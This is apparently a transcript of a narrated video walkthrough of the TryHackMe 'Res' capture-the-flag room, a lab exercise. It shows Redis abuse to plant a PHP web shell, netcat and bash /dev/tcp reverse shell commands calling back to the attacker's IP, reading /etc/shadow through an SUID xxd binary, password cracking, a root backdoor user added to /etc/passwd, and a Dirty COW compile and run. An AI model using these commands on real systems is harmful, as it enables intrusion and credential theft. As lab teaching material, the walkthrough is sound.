Hello everyone, my name is John Hammond. Welcome back to another YouTube video, and in this video I want to be showcasing the Res room from TryHackMe. It's all about Redis, or "Reddis", I don't know how to pronounce that. I don't know how to pronounce anything. It says: "Hack into a vulnerable database server with an in-memory data structure in this semi-guided challenge." This is rated an easy room, and I suppose it has some, I guess, I don't know, fundamental stuff to it, especially for the privesc, but I think it is very cool and fun to showcase Redis as something that you could abuse and take advantage of.

So I've deployed the machine already. I have this IP address and I'll copy it. If you haven't already deployed the machine, you can hit that green "Deploy" button here, and then we can start to take a look at the box. I have already filled out all these questions and answers here; I will showcase how we get into each of those, but let's dive in.

So I've got a terminal open here. I will ping that box so I can confirm that I can reach it, and let's make a directory, youtube/res, to work in. You could start some notes, you could make a little Sublime Text file, I don't know, or whatever text editor of choice you've got to work with, and make a little README for yourself, but I'm gonna start with an nmap scan. I'm gonna use `nmap -sC -sV -oN nmap/initial` with this IP address. So safe scripts, or default scripts, and then enumerate versions, output to the nmap format in that nmap directory that I just created, and I'll save the file as initial, and I'm copying and pasting that IP address in there. So I could turn on verbose mode, hit the V button. Realistically, I probably should have included that `-v` argument so it's already verbose by default, but we'll see how long this takes, and I guess we can start poking around on the box manually while we're waiting. So I will access it in a web browser over here. I'll just see if I can reach it.
It looks like there is an HTTP port open, or HTTP listening on port 80, right? Okay, we're rolling through and we found port 80. Great, but that has not found anything else, seemingly; we've only found that port. So just to be sure, because our default nmap scan will look for only the first common thousand ports, we should also run a `-p-`, and that will include all ports. We'll just call that "all". We probably don't need to do those other enumeration scripts, but I guess maybe that's good to do this again. I probably should have included that `-v` flag, but regardless, looks like we're scanning with nmap just fine.

So we know we have port 80. We could start to, like, do some enumeration on that. We could Nikto it, we could gobuster, we could dirbuster, we could start to try and look at more that might be on that page. I do have Nikto. I have a typo there, sorry. Now let's see if that will run, and I should tee that out to log it, so let me `tee nikto.log`. There we go, just some basic fundamentals, see if that finds anything interesting, and while we're doing that we could run gobuster as well. I do have gobuster, good. So `gobuster dir -u` for the URL, `-w` for the wordlist. Do I actually have a wordlist in here? I don't think so. What is it in Kali, /usr/share/wordlists? Wordlists, there is one there. Okay, and let's get dirbuster's wordlist, and they have a directory-list-2.3-medium. I suppose we can fire that up and see if that gets anything.

Still waiting for this nmap scan to return; it'll probably take a little bit. I could be showcasing RustScan, and that would likely find it super duper fast. Admittedly, I am working within Kali on WSL right now, so running RustScan using that Docker container with the kind of Windows Docker Desktop thing, pasting in the IP address and using it with RustScan.
It tends to just kind of die. I'm not exactly sure why. I'm sure I could be passing other arguments, so maybe that'll kind of work better with it if I increase the batch size, but it just doesn't happen. So, I don't know, maybe one of you has a solution better than I do. But doesn't look like there's anything that Nikto's finding, doesn't look like there's anything that gobuster is finding, and nmap is taking its sweet time. RustScan just gave up, which is fantastic to see. All right.

We could do some research on Redis while we're waiting, if my internet comes to hang out. Okay, great. Redis. "Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker." Okay, so I actually end up using Redis when I'm setting up CTFd instances, when I'm hosting Capture The Flag events. We create a Redis server and make sure that, okay, all of the user sessions are able to be actually stored and maintained and accessed, so Redis is the server that we end up creating for that. Typically we'll end up having an authorization set up, or we'll create a password for that Redis server to work on, and that might not be the case when we're looking at it in a, I don't know, hacking lab or hacking environment. So if we wanted to go find out the port that it's listening on, it says by default the Redis server is configured to run on the default port of 6379. You can connect to the server locally or remotely using the redis-cli command line tool, and then you'll need to specify a password. Okay.
It looks like there is some documentation that showcases that, so we could explore that if we'd like. Let me shut down Nikto and dirbuster and then start to kind of tinker. I will try and use that redis-cli command, and I need to supply what I actually want to connect to. If you don't have redis-cli installed, you might need to go ahead and actually `sudo apt install redis-tools`; redis-tools is the package name that includes that, and maybe your shell actually suggested that to you. I'm not exactly positive, but it'll just go ahead and type in your password, install it, and then you are good to go.

So let me `redis-cli`, and then you'll specify `-h` for the host that you want to connect to, and I'll grab that IP address one more time so I can connect to it. There we go, submit there, and now seemingly we are connected. We are on that host, and I don't know if we actually have needed to authenticate or not. Something that you could do to test is just try and run, like, `ping`, and if it responds with `PONG` then, okay, you are in fact connected to the server totally just fine. And we could look up some Redis enumeration techniques, or like "hacking Redis" or "exploiting Redis", and see what we've got here. HackTricks puts out a great resource on this sort of thing.
So let me zoom in on that so you can see it. Basic information: we've got the exact same kind of blurb that we saw online when we were simply googling, and we've got that default port. We could do automatic enumeration with some nmap scripts, so that would probably be good to do, especially since we can confirm, and now that we know, that we actually have a Redis server here. Our own nmap scan is probably taking a serious amount of time because it's doing all ports. You could use a banner grab, so you could simply netcat to it to try and get any actual information, or we could just connect as we've done with redis-cli, and the installation is just as I discussed.

The first command you could try to use is `info`. It may return output with information of the Redis instance, or something like the following is returned. So if you see this "NOAUTH Authentication required", that means that you will need credentials to be able to access the Redis server. In the instance here, let's try and just go ahead and run that `info` command and see what we get, and we certainly do not have the whine and complaint that we need authorization or authentication. So there's some valuable and juicy info. We have the Redis server version, 6.0.7, so we could copy and paste that, and that I know is one of the answers that we need here.

"Scan the machine, how many ports are open?" We saw 80, and we also know that Redis is open on 6379, so 2 is the proper answer there. Redis is the database management system that's installed, as we have discovered. "What port is the database management system running on?" 6379, again as we've discovered. "What's the version of the management system installed on the server?" 6.0.7, and that is what we just determined running that `info` command. So that's all that we really needed to run there to track down that information, and then we need to just compromise the machine.
Okay, so let's kind of keep exploring and reading through this pentesting Redis documentation. There are notes here, or at least this HackTricks, right, not particularly documentation. By default Redis can be accessed without credentials; however, it can be configured to support only a password, or username and password. We could specify this in the redis.conf configuration file, and maybe at some point we could kind of configure and tinker with that, play with it, but in this case we don't have to. We will not need to `AUTH`, or authenticate. If you have valid credentials you'll get this positive "+OK" response.

After you've logged in, or once you have access, you could do more enumeration and just kind of look for stuff. You can start enumerating the service with the following commands: `info`, which we've already ran; `client list`, which we could explore; Redis responds with connected clients. So let's do `client list`, and looks like that's my IP address locally, and that's the only thing that's currently connected to it. And we could get everything out of the configuration database, or config, so let's do `config get *`, literally everything, and now there is a lot of stuff.

So this returns and outputs in kind of an interesting and peculiar way, where there will be a variable name on one line and then the value following it. So `rdbchecksum` is set to `yes`, `daemonize` is set to `no`, etc. It's not going to give you like a "variable = value" syntax, or like a colon to denote it really readably; you'll just have to kind of take that information with one line following to get the actual value. A lot of information here. Maybe something that could be particularly interesting for us, especially some stuff that we will get into next, we can discuss, but this article again explains more Redis commands that we could work with. We also discuss dumping the database. Inside Redis the databases are numbers, excuse me, are numbers starting from zero.
You can find if anyone is using the output of the command `info` inside the "keyspace" chunk. Okay, that's particularly interesting, but I'm more concerned with getting remote code execution to compromise the machine. Okay, looks like we could potentially get a web shell, but you'd have to know the path of the website folder. Well, we do have this "Apache2 Ubuntu Default Page", and I wonder if that will tell us. "By default, Ubuntu does not allow access through the web browser to any file apart of those located in /var/www, public_html directories." Okay, the default Ubuntu document root is /var/www/html. That's kind of common; that's pretty much what we would expect, but we could see that typically with this Ubuntu default page. That's pretty handy.

So what we could do is we could connect to our victim Redis server, we could set the directory by modifying config, and then set a file name for it to be stored as. If we give it a .php extension, then we could just, okay, just set a value seemingly, and then go ahead and save, and it might dump that file. So we could try that. Let's go ahead and do some `config set dir /var/www/html`, right? Okay, so that responded positively, and then we could `config set dbfilename test.php`, maybe, right? And now let's just set a variable name, so `test`, and it doesn't matter because it'll be included in this dump when we save everything; it's kind of in Redis's memory, right? We could set this to, I don't know why my voice went weird there, let's check out `phpinfo()` and see if we can actually get PHP code execution. For one thing, now we've set that variable, and we can `save` it. Good. So let's hop back over to the web page here and try and access test.php. Okay, now we have phpinfo and we have proof that we can execute PHP, which means that we have server-side code execution.
So let's make this a little bit more fun. Let's set our database file name to something like shell.php, and let's set `test` to something like `system()` with a variable that we could pass to it, like `$_GET['c']` or something. `$_GET` will let us specify an HTTP variable that we've supplied, and `c` will just be the variable name that we want to use. So now when I run this and I save that, we should be able to have shell.php run anything that we'd like if we pass it in. Okay, so right now I haven't supplied any command, I haven't supplied a `c` value, but if I do, with a little question mark and `c=id`, ooh, we have data and a uid and gid output. So it looks like we are running commands, right? We could run like `whoami` and `dir` and list, or `ls`, and other things, so we have code execution.

Now we just kind of want to get a reverse shell back to us, so what could we do here? We could use a typical, like, pentestmonkey reverse shell cheat sheet and use like a netcat connection to get back to us. Something that we also could do is actually open up a bind shell, depending on what version of netcat we have, and actually let's verify we actually have netcat with a `which nc`. Okay, we do have a /bin/nc, seemingly. So could I try and run like `nc -v` for the version? Is that a thing, `--version`? No, seemingly. Okay, let's try to see if it has that old `-e` argument, or that `-e` flag and parameter, where we can specify a command to run as you connect back to it. So `-e /bin/bash`, and then let's listen, so `-lnvp`: `l` for listen, `n` for don't resolve domain names and DNS stuff, `v` for verbose, and `p` for the port. Let's put it on like 8888 or whatever. Now, because I see the URL in the web page still spinning, I kind of have the thought that it's actively running that, so I could go ahead and connect to it, or at least try to, right? So let me move out of this terminal and let's netcat to that IP address.
That's 10.10.31.148 I think, and it's 8888, right? So I'm seemingly connected and I have command execution, right? So I can run things and navigate around the file system. Awesome. Okay, good win, good, we got it. That's one way of doing it, or you could of course do a simple bash shell.

Interesting thing. Let me have that reverse shell, the bash reverse shell. I'll set up a listener on my attacker machine on 9999, and let me try to use that bash reverse shell. So I finally remembered this, I finally memorized it, and I want you to try and remember it too: `bash -i` for interactive, redirected to an ampersand, right, `>&`, and then `/dev/tcp/` your IP address, so I'm 10.2.21.32, and then slash and the port, so 9999 is what I'm listening on, and then we've got to start from zero, right, and you redirect it to ampersand one: `0>&1`. That's kind of how I've started to remember it, so now you don't have to look up "hey, what's that bash syntax for a reverse shell" all the time.

When you run this you may or may not actually get a shell back. The gimmick here is that if it's running in sh, or just that regular default flat shell, it's not gonna work; it's gonna get some "bad file descriptor", so that doesn't execute. What you could do is you could pass it to another bash command, so if in this URL I included a `bash -c` and then included like some quotes to denote this here, now I've got bash running, and that might not have ran for me. Let me use single quotes here, see if that will behave, or I might just have my syntax wrong. Maybe I lied the entire time. Let's get the HighOn.Coffee reverse shell cheat sheet and verify. I could very well be wrong, while I'm trying to tell you "oh, this is how you remember this thing", and I just misremember myself. `bash -i >& /dev/tcp/<attacking IP address>/<port> 0>&1`.
So that's totally right. Maybe we need /bin/bash, or I need a space following these for some reason, and bash can be super duper finicky. Let me verify that my IP address is what I think it is, so I will `ip a show tun0`, and I am 10.2.21.32, listening on 9999. So let's see if that works. Still nothing. Maybe it's my WSL thing being annoying. I shouldn't waste my time troubleshooting this when we already have given ourselves code execution previously. Doesn't need to be an issue. Maybe, if anything, you memorize the fact that, okay, `/bin/bash -i` with that is the way that you get that. What am I missing here? This is blowing my mind. That's the right syntax, 10.2.21.32, 9999, nothing. Nothing. Okay, whatever. Well, we'll edit that part out, we'll get it in post.

We'll do that `nc -e` methodology for /bin/bash and then let's listen on 8888, and now that that is running we know we could connect back to it and get code execution. Fun thing here is that we could very well connect with pwncat. So let me start that one more time, and I'm going to hop on over to a different shell. Let me move into pwncat and I will `git pull` to get the current release, because Caleb's doing some crazy work on this right now, and we could showcase some of that. Let's invoke our virtual environment and then run pwncat and connect to that 10.10.31.148, is that right, 31? I was so close. There we go, on 8888. So now we should be connecting to it. Great. "Not in the database", so it'll go ahead and connect to it, and that works just fine for us.

So pwncat will be able to kind of showcase a lot of our enumeration stuff in a very quick and easy way. It might take some time, so we might fire up another session while we're working here, but I'm gonna switch to my local prompt. I'm gonna use the new syntax to try and run `enumerate`, and if I tab-complete on enumerate you could `enumerate.gather` and just start to look for stuff. So pwncat will do its thing.
He's essentially running his own version of LinPEAS. But let's go open up another terminal and try and connect back to it. I should have started like a reverse shell while I was doing that, but let's listen on 9999 and then just do a regular connection here. There we go. Or I could very well just do that with another pwncat instance and see if he survives. We can clear those old terminals that we don't need anymore. Let's let pwncat do his thing. He might take a little bit, because TryHackMe seems to be slow. When I use this on a HackTheBox it's much, much faster; TryHackMe, I think, is a little bit, I don't know.

Interesting thing though, because I'm comparing and discussing HackTheBox in relation to TryHackMe right now: you might have seen this gimmick with a Redis technique here on the Postman machine, and you could use it to, okay, clobber one of the user's private keys, like their SSH private keys, so you could SSH into the box, and that would give you initial access, and that was great. And I thought like, oh, Res is gonna be just like that, I could clobber an SSH key, but we don't have SSH open on this machine, so that kind of gets in the way. Whatever. Interesting. We've got now this web shell, kind of a cool, new, different technique we could use.

So let's do some manual enumeration. We know we are currently running as www-data, so let's go ahead and cat out /etc/passwd. Ooh, but pwncat has finished, so let's see what he's got for me. Blah blah blah, scrolling through. Looks like we have results here. So we have a mount point, we have some network information, we are running Ubuntu 16.04, ASLR is enabled, potentially found some passwords, although these are just `$2`s, so that doesn't make a whole lot of sense. Processes that are running, a kernel version, and SUID binaries. Ooh, xxd is owned by root. That's peculiar. xxd is like a blaring and blatant GTFOBin. Oh, is it also vulnerable to Dirty COW? That'd be fun.
We should try and use Dirty COW, be a little fun extracurricular at the end of this video. Let's try to showcase that GTFOBins gimmick. So GTFOBins, if you're searching for these, xxd is a quick and easy win. In this case, actually, because it's owned by root, we could probably just get that, you know. Let's search for xxd, and it can file write and file read, so we could just clobber /etc/passwd and get another user.

So pwncat knows how to do this, actually. If you try and run `escalate auto` it'll just tell you what it could potentially do, because it knows, hey, we can read and write with xxd as root. We could just go ahead and execute that, and then it will try to clobber /etc/passwd. We've been finagling this because I brought it up, and it seems to think that it failed when it actually succeeded, and let me see if it shows you here. I'm kind of hoping we could; didn't mean to zoom in on that while it was going. But it'll give me like "hey, error, module failed, no escalation path found", but if I check out /etc/passwd, which we've clobbered, oh, let's get to a remote prompt, we have successfully added a pwncat user with a backdoor password that has user ID 0 and can just be root. So I will `su` to pwncat and use the pwncat password with the backdoor, and now we're root. That's it. Okay, done. For some reason pwncat doesn't think that it succeeded, and we're still kind of troubleshooting that, but literally running it again it'll be like, "oh, I found your persistence", because I already created it, and then it'll just give you root. So that's neat.

Moving into /root, which you can do, then you can cat the flag, root.txt, and you win. Okay, that's all you needed to do. If you had not done that, if you had been able to go into the other user here, which I think was vianka, yeah, vianka actually has permissions to just run sudo everything. So let me `su` into vianka, because I can, and let's try and `sudo -l`. You don't need her password.
Do you need her password? Regardless, let me not care about that, because we've just jumped over user and got into root. We could get into her home directory and then cat that flag, `cat user.txt`. Yep, and you would submit that just fine. We could answer those last questions. Oh, "what is the local user account?" Oh, I follow. Yeah, I'm sorry, because you had xxd as your privesc you could use xxd to read /etc/shadow and then you could grab the user's hash and then crack it. That's kind of nice and easy, and we could do that, right?

Let's try and use some of those GTFOBins manually, just so you see actually what's happening. File read with xxd: if I were just www-data again, we could `xxd /etc/shadow` and just simply read it out, and then we have vianka's password hash. So we could crack that with John the Ripper. So let's move over to our same directory where we were, we were in youtube/res. Let's `subl shadow.txt` or something and just slap it in there, and then we should be able to run John. Yep, I think of that, and then wordlist. Where is, do we even need to specify wordlist? Well, John just figured it out. While John is cranking, let's try to see. Oh yeah, he just grabs his own /usr/share/john. Is there one for rockyou? Oh yeah, it just rips it out. I'm not used to being on Kali, I'll admit, man. /usr/share/wordlists/rockyou, yeah, okay, it's there.

So then you could `su` into vianka. Beautiful. One, and then you could `sudo -l`. Spell that right. I think I still spelled it wrong. Nope. Okay. She can just literally run everything. He or she, vianka, male or female, I don't know; you can sudo everything, so there's root immediately. Gimmicks and fun things here, though, before we start to dive into Dirty COW, because you guys like when I move into stuff that I haven't seen before. There's an interesting gimmick with this file write in xxd. Let's say you are trying to write into "anything", how about that?
That'll be the name of the file that we want to write to, and xxd writes from only the beginning, and that's it. So let me show you this. Let me paste this in, and it's going to ruin this prompt, so let me `sync` and `reset`. Cool. If I paste this it still ruins that prompt. Whatever. How about that? Nope. Let's get a regular shell. Let's do this from home, who cares. Let's set `LFILE` to anything, and then let's try and write, echo like nine 9s, 1 2 3 4 5 1 2 3, into LFILE. So now I have this "anything" file, but if I were to echo five 5s, 1 2 3 4 5, `cat anything`, I've added five 5s, and then there's my newline, and then there's the remaining 9s. This would probably be a better example with `echo -n` so we don't have a newline. You'll notice that it's not clobbering the original data. That's just how it's going to end up doing it.

Let me empty out "anything" so we can clear it out and get a better visual. Add in 4s, and now let's add in just 2s, and it just starts at the beginning and writes everything that you specify. That's good to note, is that if you don't fill up the whole rest of that file buffer, yeah, it'll still linger in there, especially when you use xxd, at least with that GTFOBins technique. So good to know. All right.

We've got root, we've showcased some xxd stuff, and do we have gcc? We do. All right, let's try Dirty COW. Let's try it, dirty cow .c. Here's one, and that is the one that's, I think, just tampering a file. I want FireFart's Dirty COW. FireFart, I think it's the, yeah, it's dirty.c, this one here. It'll add a whole user for us, and it explains how you can compile it nice and easily. Let's see if we could write this here. Let's just go ahead and, where am I currently? In pwncat. Oh, I'm in pwncat. That's annoying.
So let's move into there, into pwncat, and let's just `subl dirty.c`, slap all that in, and now let's go ahead and upload that. So let's `upload dirty.c`. There we go, and now in my /tmp directory I have dirty.c. If I cat that out on the victim, we have our Dirty COW source code. So let's gcc, and the syntax they use here is `-pthread`, and `-lcrypt` are the libraries that we're also going to include, so slap that in, see if it will compile. It should output to dirty. That's completed. Now I have dirty, which is a binary file I could run. So let's make sure that's executable. I think the compiler will already do that. Let's try it and see if we don't break this box.

"/etc/passwd successfully backed up to /tmp/passwd.bak", enter the new password. I'll type in "anything", and let's give it a little bit of time to see if it actually does complete the Dirty COW exploit. I know this is a little bit dangerous; it might shake the box up, but I want to showcase it, I want to tinker with it, I want to see if it'll be anything fun. I guess I'll pause the recording now and just let this do its thing, but I hope you guys have learned some other good nuggets while we've been rolling through it. Thanks, I'll see you soon.

Okay, I stepped out for a quick little bio break, but it looked like it finished. "Done. Check /etc/passwd to see if the new user was created. You could log in with the username firefart and the password anything", which is the one that I typed in there. I did not mean to copy that and try to type it. Okay. Is firefart in /etc/passwd? Um, seemingly no. `su firefart`, does he exist? No. Is it not /etc/shadow? Is it? Should I, should I, /etc/shadow? No, oh, I need to be root. Well, yeah, okay, fine. I'm pretty sure Dirty COW is probably not even applicable to 16.04. Let's check dirtycow.ninja. You can check out that page and see what he's got here. Oh, no, I don't want these proof of concepts.
I want to see the "check if your system is vulnerable". You could see the patched kernel versions. Yeah, 16.04 LTS, and that is the kernel version that we saw, 4.4.0, right? Let's do a `uname -a`. Yeah, I believe, okay, maybe 4.4.0 and then 189, so I'm thinking that's past. But that was fun. That was a good little exercise. You guys were probably screaming at me like, "stop, don't bother John, it's not even vulnerable", but hey, you got to see the compile process, and maybe that was a good little exercise. Okay, that's enough of me talking. This has been a long video, but hey, thank you guys so much for watching. I hope you enjoyed, I hope you're able to follow along and see all of the little gimmicks and techniques and tricks there, but that's how I got those flags here and completed the Res room. So thanks for hanging out everybody, I hope you enjoy, and I'll see you in the next video. I love you.